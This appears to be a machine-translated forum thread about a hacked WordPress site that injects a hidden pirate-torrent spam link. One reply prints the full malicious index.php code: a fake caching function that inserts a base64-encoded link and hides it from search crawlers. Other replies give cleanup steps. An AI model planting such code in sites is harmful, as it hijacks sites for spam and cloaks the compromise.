格式错误的div标签和piratebay链接被插入wordpress网站



在wordpress网站上,通过某种攻击插入了一个格式错误的div标签和一个指向iratebay.in.ua的链接。

插入的代码是:

div style="position:absolute;top:-1488px;"&gt;<a href="http://thepiratebay.in.ua">torrents,pirate,piratebay,software torrents,porn,porn download</a>

在该网站的克隆上,我已经从当前主题切换到默认主题,并且我还禁用了所有活动插件,但问题仍然存在。

grep'in all site files for'porn'or'piratebay'find nothing and the same is true for search the database。插入发生在页脚完成之后,在<body>标记底部加载脚本的过程中。

该攻击似乎还允许东欧垃圾邮件发送者发送邮件,如:

Tylko spojrzcie jak ten dran zarabia!

有人看到这个吗?或者有关于下一步补救措施的建议?

感谢

我遇到了完全相同的问题,只是得到了解决。检查你的index.php

我的几天前进行了修改,与其他wordpress安装相比,我看到它一开始就有这些额外的行:

//eAccelerate Caching System
/*ordpr*/
@ini_set('display_errors', '0');
ob_start('__e_accelerate_engine');
register_shutdown_function('ob_end_flush');
function __e_accelerate_engine($output) {if ((substr(trim($_SERVER['REMOTE_ADDR']),0,6)!=='74.125') && !preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])){
$data=serialize(array('page'=>md5($_SERVER['REQUEST_URI']), 'host'=>$_SERVER['HTTP_HOST'],'ip'=>$_SERVER['REMOTE_ADDR'],'ua'=>$_SERVER["HTTP_USER_AGENT"],'kdg'=>20));$tags=array('</body>');shuffle($tags);foreach($tags as $tg){if(preg_match('!'.$tg.'!', $output)) {$output=preg_replace('!'.$tg.'!', base64_decode('PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOi0xNDg4cHg7Ij48YSBocmVmPSJodHRwOi8vdGhlcGlyYXRlYmF5LmluLnVhIj5waXJhdGViYXkscGlyYXRlIGJheSxwaXJhdGUsYmF5LHRvcnJlbnRzLGZyZWUsZnJlZSBzb2Z0d2FyZSxzb2Z0d2FyZSx0b3JyZW50cyxmcmVlIHRvcnJlbnRzLGZyZWUgcG9ybixwb3JuIHRvcnJlbnRzLHRvcnJlbnQ8L2E+PC9kaXY+').$tg, $output, 1);break;}}}return ((isset($_GET['fccheck']))?('<!--check:'.md5($_GET['fccheck']).'-->'):('')).$output;}

要检查我运行的最后修改的文件:

 find *.php -mtime -96

(96表示4天)我刚刚删除了行,div就不见了!

我希望它也能为你解决问题。


编辑:顺便说一句,我最近几天遇到了很大的邮件问题,我受到了反向散射的攻击,每小时发送数百次错误的反弹,我的Ip在MxToolBox上被列入了15个黑名单。我不知道是不是这个原因,但幸运的是现在已经解决了。所以如果我是你,我会在那里或类似的页面上查看你的Ip。

首先,检查整个WP安装,看看哪些是最新更新的文件。那将是你开始寻找的地方。代码通常是加密的,这就是为什么使用grep找不到它的原因。寻找类似的东西:

eval(gzinflate(base64_decode(..)));

尝试对"eval"或"base64_decode"进行grep'ing。

此代码通常插入functions.php文件或主题的页脚中。你可以通过激活另一个主题来测试这一点。此外,尝试禁用所有插件,看看这是否最终会删除代码。

这是一个方便的解决和预防指南:

http://codex.wordpress.org/FAQ_My_site_was_hacked

谷歌每个插件名称后面都有漏洞。我遇到过类似的问题,攻击者通过插件进入。

相关内容

  • 没有找到相关文章

最新更新